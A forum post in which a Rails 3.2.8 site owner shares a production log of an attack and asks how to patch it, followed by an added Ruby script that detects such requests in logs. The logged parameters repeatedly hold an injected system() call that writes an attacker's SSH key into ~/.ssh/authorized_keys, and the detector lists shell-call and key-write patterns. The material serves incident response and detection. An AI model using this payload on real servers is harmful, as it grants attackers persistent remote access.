I noticed some unusual activity on my website a couple of days ago, so I decided to check the production log. Here is what I found:

Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000 Processing by HomeController#logo as */* Parameters: {"exploit"=># <ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 @routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

"=> #<OpenStruct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo; system('cd ~; mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx TwyFM= root >> ~/.ssh/authorized_keys')

__END__

_url", :"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_url", :"hash_for_foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_path", :"foo; system('cd ~;mkdir .ssh; echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')

__END__

_path"], @module=#<Module:0xcb7e5c4>>} Rendered landing_users/_form.html.haml (4.7ms) Rendered home/logo.html.haml within layouts/application (7.8ms) Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)

I went on to check whether their system calls had worked, and sure enough, in ~/.ssh/authorized_keys I found the same SSH key. So this means they were able to run system calls through my Rails app!!!! Thankfully my Rails app isn't run as root, so they did not get root access. But regardless, this terrifies me.

Has anyone encountered this exploit before? If so, how did you patch it?

My Rails app is on Ubuntu 12.04, using Rails version 3.2.8 and Ruby version 1.9.3p125. If any other information would help, please let me know!

I found a blog post referring to this exploit, but no solutions, just how to perform it.
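As an added example (not from the post above or from Rails itself), here is a small Ruby detector for the pattern visible in that log: a request whose logged Parameters contain Ruby object inspect output, a shell call, or a write to authorized_keys, none of which belong in a normally parsed parameter hash. The log sample, IP addresses and the indicator list are constructed for this example.

```ruby
# Constructed sample of a Rails 3.2 production log: one entry mirroring the
# post (key blob shortened, documentation IP) and one ordinary request.
SAMPLE_LOG = <<~'LOG'
  Started GET "/" for 203.0.113.7 at 2013-01-11 20:25:05 +0000
  Processing by HomeController#logo as */*
    Parameters: {"exploit"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 @routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAA...EXAMPLE root >> ~/.ssh/authorized_keys')

  __END__

  "=>#<OpenStruct defaults={:action=>"create"}>}>}
  Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)
  Started GET "/about" for 198.51.100.4 at 2013-01-11 20:26:10 +0000
  Processing by PagesController#about as HTML
    Parameters: {"id"=>"42", "q"=>"hello"}
  Completed 200 OK in 3ms (Views: 2.1ms | ActiveRecord: 0.0ms)
LOG

# Indicators chosen for this example. A Parameters line normally holds only
# strings, hashes and arrays, so "#<SomeClass" means an arbitrary object was
# deserialised from the request body.
INDICATORS = {
  deserialized_object: /#<[A-Z][\w:]*/,
  shell_call:          /\b(?:system|exec|spawn|popen)\s*\(|`/,
  ssh_key_write:       /authorized_keys/,
  end_marker:          /^__END__$/
}.freeze

# Group log lines into per-request entries, each starting at a "Started" line.
def split_requests(log)
  requests = []
  log.each_line do |line|
    requests << +'' if line.start_with?('Started ')
    requests.last << line unless requests.empty?
  end
  requests
end

# Return the source IP, timestamp, route and matched indicators for every
# request whose Parameters (which may span lines) trip at least one indicator.
def suspicious_requests(log)
  split_requests(log).filter_map do |entry|
    header = entry.match(/\AStarted (\S+) "([^"]*)" for (\S+) at (.+)$/)
    next unless header
    params = entry[/Parameters: (.*?)(?=^Completed |\z)/m, 1]
    next unless params
    hits = INDICATORS.select { |_, re| params.match?(re) }.keys
    next if hits.empty?
    { ip: header[3], time: header[4].strip, method: header[1],
      path: header[2], indicators: hits }
  end
end

suspicious_requests(SAMPLE_LOG).each { |r| puts r.inspect } if $PROGRAM_NAME == __FILE__
```

Running it over a real production log gives the offending source IPs and timestamps to correlate with the authorized_keys modification time; it flags only what was logged, so it cannot show anything the app never parsed.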